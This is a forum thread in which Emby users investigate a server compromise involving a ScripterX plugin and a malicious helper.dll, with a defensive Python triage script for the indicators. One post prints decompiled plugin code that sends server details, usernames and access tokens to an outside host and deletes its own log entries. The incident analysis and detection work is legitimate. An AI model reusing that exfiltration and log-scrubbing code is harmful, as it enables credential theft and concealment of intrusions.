Has my Windows emby server been hacked.


tongeha

1 minute ago, Luke said:

We’ll be able to tell by the features they advertise. 

Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it.  So we'll have to go deeper than that.


23 minutes ago, ebr said:

Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it.  So we'll have to go deeper than that.

Yes, we need to understand what a plugin does and how and evaluate the risk that is involved.


bandit8623

End of the day though, it's up to the server owner to make the decision to install a plugin. You risk more the more plugins you install....

Edited by bandit8623

tongeha

I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down.

Once on the machine it took these actions

1. installed ScripterX

2. attempted a no-password login and was refused

3. tried downloading helper.dll, which looks like a compromised version of ScripterX

4. uninstalled ScripterX

I am unsure of the correct order.

I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by Win 10, {emby_temp}\plugins\EmbyHelper.dll, and it does not appear to be loaded by any process.

I did have Webhooks installed in emby, which I never used. Still need to look at Webhooks' dependencies and see if it uses ScripterX.

For now I'm going to run emby in a separate account and only give it access to the media directory on my nas. Or I may go back to running it on ubuntu or a truenas jail.


6 minutes ago, tongeha said:

I'm still trying to determine how it found its way onto the machine. The only way was through emby, all other ports are shut down.


If you mean how did the plug-in get installed, it’s extremely common that users install or configure things when they’re experimenting and then later forget that they did that. We see it on a pretty much daily basis when troubleshooting with users.


7 minutes ago, tongeha said:

I did find EmbyHelper.dll in the emby temp directory. But it is not flagged as a virus by win 10, {emby_temp}\plugins\EmbyHelper.dll and it does not appear to loaded by any process.

Yes, that's because Emby loads plugins in a special way-

And that's not a "temp" directory.

Edited by softworkz

tongeha

Pretty sure it is an emby temp dir. That's the way I have it configured. Emby runs on its own dedicated drive. I have it set up this way because of an old emby bug where it would not clean up the parts from an HLS stream and it would fill up the drive over time.

Never installed ScripterX on purpose. I did have Webhooks installed but never used it for anything.

D:\emby_temp\cache\0bbbe58aa44244109a8862cc833dc955_channels
D:\emby_temp\cache\c2e44542eacb47e785ff724dc10487c6_channels
D:\emby_temp\cache\fanart-movies
D:\emby_temp\cache\fanart-tv
D:\emby_temp\cache\ffmpeg
D:\emby_temp\cache\httpclient
D:\emby_temp\cache\images
D:\emby_temp\cache\omdb
D:\emby_temp\cache\remote-images
D:\emby_temp\cache\temp
D:\emby_temp\cache\tmdb-movies2
D:\emby_temp\cache\tmdb-tv
D:\emby_temp\cache\tvdb
D:\emby_temp\cache\tvdb-movies
D:\emby_temp\cache\xmltv
D:\emby_temp\cache\fanart-movies\699
D:\emby_temp\cache\fanart-movies\9319
D:\emby_temp\cache\fanart-movies\699\fanart.json
D:\emby_temp\cache\fanart-movies\9319\fanart.json
D:\emby_temp\cache\fanart-tv\290734
D:\emby_temp\cache\fanart-tv\325186
D:\emby_temp\cache\fanart-tv\73255
D:\emby_temp\cache\fanart-tv\290734\fanart.json
D:\emby_temp\cache\fanart-tv\325186\fanart.json


2 hours ago, tongeha said:

I'm still trying to determine how it found its way onto the machine.

What is "it" in that sentence?


tongeha

The mystery continues. I found this in ScheduleTasks

{
   "StartTimeUtc":"2023-05-11T17:54:54.4550806Z",
   "EndTimeUtc":"2023-05-11T17:54:54.4562473Z",
   "Status":"Completed",
   "Name":"Emby ScripterX Scheduled Task",
   "Key":"embscriptxschedtask00001",
   "Id":"09b64e34940a61db86d4939f418b338b"
}

And this in system.xml

  <UninstalledPlugins>
    <string>TVHeadEnd.dll</string>
    <string>MediaBrowser.Channels.IPTV.dll</string>
    <string>EmbyScripterX.dll</string>
  </UninstalledPlugins>


1 hour ago, tongeha said:

{
   "StartTimeUtc":"2023-05-11T17:54:54.4550806Z",
   "EndTimeUtc":"2023-05-11T17:54:54.4562473Z",
   "Status":"Completed",
   "Name":"Emby ScripterX Scheduled Task",
   "Key":"embscriptxschedtask00001",
   "Id":"09b64e34940a61db86d4939f418b338b"
}

I imagine that was created by the plug-in as that would be a common practice.

1 hour ago, tongeha said:

And this in system.xml

  <UninstalledPlugins>
    <string>TVHeadEnd.dll</string>
    <string>MediaBrowser.Channels.IPTV.dll</string>
    <string>EmbyScripterX.dll</string>
  </UninstalledPlugins>

and I imagine you uninstalled the plug-in when you discovered this situation...?


3 minutes ago, Spaceboy said:

are you recommending uninstalling this plugin then?

Yes.

EDIT: At least for now

Edited by softworkz

5 minutes ago, Spaceboy said:

are you recommending uninstalling this plugin then?

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.


TeamB

if anyone is interested here is the source of the helper.dll linked to in the first post CDN

This is decompiled from the DLL

As mentioned above, some interesting tell-tales:

    private void subscribeEvents() => this._sessionManager.AuthenticationSucceeded += new EventHandler<GenericEventArgs<AuthenticationResult>>(this._sessionManager_AuthenticationSucceeded);

    private void _sessionManager_AuthenticationSucceeded(
      object sender,
      GenericEventArgs<AuthenticationResult> e)
    {
      AuthenticationResult authenticationResult = e.Argument;
      StringContent content = new StringContent(string.Format("{{\"version\":\"{0}\",\"serverName\":\"{1}\",\"serverPort\":\"{2}\",\"serverHttpsPort\":\"{3}\",\"serverPublicPort\":\"{4}\",\"serverPublicHttpsPort\":\"{5}\",\"serverVersion\":\"{6}\",\"serverPlatformOs\":\"{7}\",\"serverPlatformOsVer\":\"{8}\",\"userId\":\"{9}\",\"username\":\"{10}\",\"userServerName\":\"{11}\",\"serverId\":\"{12}\",\"deviceId\":\"{13}\",\"deviceName\":\"{14}\",\"deviceRemoteIpaddress\":\"{15}\", \"accessToken\":\"{16}\"}}", (object) EmbyHelper.Version.VersionNumber, (object) Plugin._Controller._serverApplicationHost.FriendlyName, (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpServerPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpsPortNumber.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicPort.ToString(), (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicHttpsPort.ToString(), (object) Plugin._Controller._applicationHost.ApplicationVersion, (object) Plugin._Controller._environmentInfo.OperatingSystemName, (object) Plugin._Controller._environmentInfo.OperatingSystemVersion, (object) authenticationResult.User.Id.ToString(), (object) authenticationResult.SessionInfo.UserName, (object) authenticationResult.User.ServerName, (object) authenticationResult.ServerId, (object) authenticationResult.SessionInfo.DeviceId, (object) authenticationResult.SessionInfo.DeviceName, (object) authenticationResult.SessionInfo.RemoteEndPoint, (object) authenticationResult.AccessToken), Encoding.UTF8, "application/json");
      HttpResponseMessage httpResponseMessage;
      Task.Run((Func<Task>) (async () => httpResponseMessage = await new HttpClient().PostAsync("https://emmm.spxaebjhxtmddsri.xyz/expanse2362", (HttpContent) content).ConfigureAwait(false)));
    }

and

    public static void CleanLog(string filePath)
    {
      List<string> list = ((IEnumerable<string>) File.ReadAllLines(filePath)).Where<string>((Func<string, bool>) (line => !line.Contains("EmbyHelper") && !line.Contains("ScripterX") && !line.Contains("scripterx"))).ToList<string>();
      File.WriteAllLines(filePath, (IEnumerable<string>) list);
    }

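A triage script for the indicators this thread walks through (the DLL on disk, the ScheduledTasks entry, the UninstalledPlugins list in system.xml, and the host the decompiled helper posts to). This is an added example, not code from the thread, from Emby or from the plugin; the data-directory layout in triage() and the <ServerConfiguration> root element are assumptions.

```python
import json
import xml.etree.ElementTree as ET
from pathlib import Path

# Indicators quoted in this thread: the DLL names, the scheduled-task Key, and the
# host the decompiled helper posts server details and access tokens to.
PLUGIN_DLLS = {"EmbyHelper.dll", "EmbyScripterX.dll"}
TASK_KEY = "embscriptxschedtask00001"
C2_HOST = "emmm.spxaebjhxtmddsri.xyz"

def check_plugin_dir(plugins_dir):
    """Sorted names of known-bad DLLs sitting in an Emby plugins directory."""
    return sorted(p.name for p in Path(plugins_dir).glob("*.dll") if p.name in PLUGIN_DLLS)

def check_task_json(text):
    """True if a ScheduledTasks JSON document is the ScripterX task posted above."""
    task = json.loads(text)
    return task.get("Key") == TASK_KEY or "ScripterX" in task.get("Name", "")

def check_system_xml(text):
    """Sorted known-bad DLLs listed under <UninstalledPlugins> in system.xml."""
    root = ET.fromstring(text)
    names = {s.text for up in root.iter("UninstalledPlugins") for s in up.findall("string")}
    return sorted(names & PLUGIN_DLLS)

def scan_log_lines(lines):
    """Lines naming the C2 host or the plugins. The helper's CleanLog() deletes lines
    containing 'EmbyHelper'/'ScripterX', so an empty result is not a clean bill of health."""
    needles = (C2_HOST, "EmbyHelper", "ScripterX", "scripterx")
    return [ln for ln in lines if any(n in ln for n in needles)]

def triage(emby_data_dir):
    """Run the file and config checks on an Emby data directory (layout is assumed)."""
    base = Path(emby_data_dir)
    tasks = [f.name for f in (base / "ScheduledTasks").glob("*.json")
             if check_task_json(f.read_text(encoding="utf-8"))]
    sysxml = base / "config" / "system.xml"
    uninstalled = check_system_xml(sysxml.read_text(encoding="utf-8")) if sysxml.is_file() else []
    return {"plugin_files": check_plugin_dir(base / "plugins"),
            "scripterx_tasks": tasks, "uninstalled": uninstalled}

# Constructed samples: the JSON is abridged from the one posted in this thread, the
# <UninstalledPlugins> block is from system.xml above (root element assumed), log line made up.
SAMPLE_TASK = ('{"StartTimeUtc":"2023-05-11T17:54:54.4550806Z","Status":"Completed",'
               '"Name":"Emby ScripterX Scheduled Task","Key":"embscriptxschedtask00001"}')
SAMPLE_XML = ("<ServerConfiguration><UninstalledPlugins><string>TVHeadEnd.dll</string>"
              "<string>EmbyScripterX.dll</string></UninstalledPlugins></ServerConfiguration>")
SAMPLE_LOG = ["Info HttpClient: POST https://emmm.spxaebjhxtmddsri.xyz/expanse2362",
              "Info SessionManager: user admin authenticated"]
```

Because the helper scrubs its own names from the logs, treat the plugins directory and the ScheduledTasks/system.xml entries as the primary evidence and the log scan as a bonus.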

Spaceboy
9 hours ago, Luke said:

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.

I only use it to initiate a comskip process as a recording starts. Emby only has options for post-processing.


rbjtech
11 hours ago, Luke said:

I’ve whipped up a command line launcher of our own that you’ll be able to try soon. It hooks into the notification system so it has the same ui, events, filters and data as web hooks.

Cool - I just use Scripter-X to write a separate Auth log which is pushed via ssh to my DMZ/RP for fail2ban.

If the native Emby Webhooks can write the Auth log, then I'd happily get rid of scripter-x as I was unhappy with the 'package' side of scripter-X anyway but there is no way to disable just that part ..

Thanks for the update all.

HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place.  Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ?   

Edited by rbjtech

Spaceboy
1 hour ago, rbjtech said:

HOWEVER - I'm still unclear (as is the OP) on how scripter-x was installed in the first place.  Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not - as with no local Admin password, that is all it would take to remotely install scripter-x, which then acts as a springboard for further executable code to be downloaded ... ?   

Agreed - this has absolutely not been answered and I'm not comforted by the devs ignoring the explicit questions on this.


1 hour ago, rbjtech said:

I'm still unclear (as is the OP) on how scripter-x was installed in the first place

We are too but I think the most likely answer is that it was done years ago and forgotten about.  Perhaps even manually before the plug-in was in the catalog.


Spaceboy
9 minutes ago, ebr said:

We are too but I think the most likely answer is that it was done years ago and forgotten about.  Perhaps even manually before the plug-in was in the catalog.

but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable.

avoidance is not a good look


1 minute ago, Spaceboy said:

but still not answered the point on whether the vulnerability discovered and patched in beta has been fixed in stable

The version number has not changed so I don't believe any patches have been issued.


tongeha

I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX from the logs.


Spaceboy
3 hours ago, ebr said:

The version number has not changed so I don't believe any patches have been issued.

Can I assume that, based on the lack of activity fixing it, you don't think this is a particularly significant issue?

I really hope you're not just waiting for 4.8 to go stable, because it feels like it's been a couple of weeks since this issue was reported and you've been hoping in vain for 4.8 to go stable for a while now. And even when it does, a lot of people will prefer to remain on 4.7 until the new version settles down. This issue needs patching in 4.7 asap.


flashls82
22 hours ago, tongeha said:

I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX  from the logs.

This is definitely what’s happening because it happened to me (on a Synology NAS). Saw an error randomly the other day on a ScripterX task in my log. I never installed it and am the only local user on the system. Looked into it and it was installed about a week ago right after my user authenticated from “127.0.0.1” (was 100% not me and it’s not the local IP that shows up when I log in for real). Not great!!

Edited by flashls82

crusher11

Is this the thing the giant red warning on the forums is about?

Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?


1 minute ago, crusher11 said:

Is this the thing the giant red warning on the forums is about?

Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?

Only on 4.8.0.31 and later. 

Many are still running earlier betas, though.

